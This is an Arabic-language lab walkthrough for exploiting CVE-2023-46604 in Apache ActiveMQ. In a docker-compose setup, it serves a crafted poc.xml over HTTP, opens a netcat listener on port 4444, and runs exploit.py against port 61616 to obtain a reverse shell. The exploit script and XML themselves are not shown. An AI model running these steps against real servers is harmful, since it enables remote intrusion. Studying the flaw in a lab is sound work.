
استغلال PoC لـ CVE-2023-46604 يستهدف Apache ActiveMQ، يقدم شل عكسي عبر حمولة XML مُصممة عبر HTTP.
CVE-2023-46604

قم بإعداد docker-compose يحتوي على صورتين وهما جهاز الضحية والجهاز الهدف وفقًا للبيئة المطلوبة على جهاز الضحية، قم بتشغيل ActiveMQ
انتقل إلى جهاز المهاجم: • قم بتشغيل خدمة HTTP لإرسال poc: python3 -m http.server
• استخدم netcat للاستماع إلى الاتصال القادم إلى جهاز المهاجم nc -nlvp 4444
• أرسل الحمولة (payload) لإنشاء اتصال reverse shell إلى جهاز المهاجم python3 exploit.py -i 172.18.0.3 -p 61616 --xml http://172.18.0.2:8000/poc.xml حيث:
يمكن ملاحظة أنه بعد تنفيذ أمر تشغيل ملف ‘exploit.py’، يرسل كود الاستغلال حزمة ‘poc.xml’ من خادم الويب إلى الهدف، وهو عنوان خدمة ActiveMQ التي تعمل على الخادم الهدف. وفي الوقت نفسه، يستقبل خادم HTTP على جهاز المهاجم request المرسل من عنوان IP الخاص بالجهاز الهدف.
بعد إرسال الحمولة، انتقل إلى الطرفية (terminal) التي تستمع على المنفذ 4444 في جهاز المهاجم. سنجد أن reverse shell الخاص بجهاز الضحية قد تم إرساله إلينا.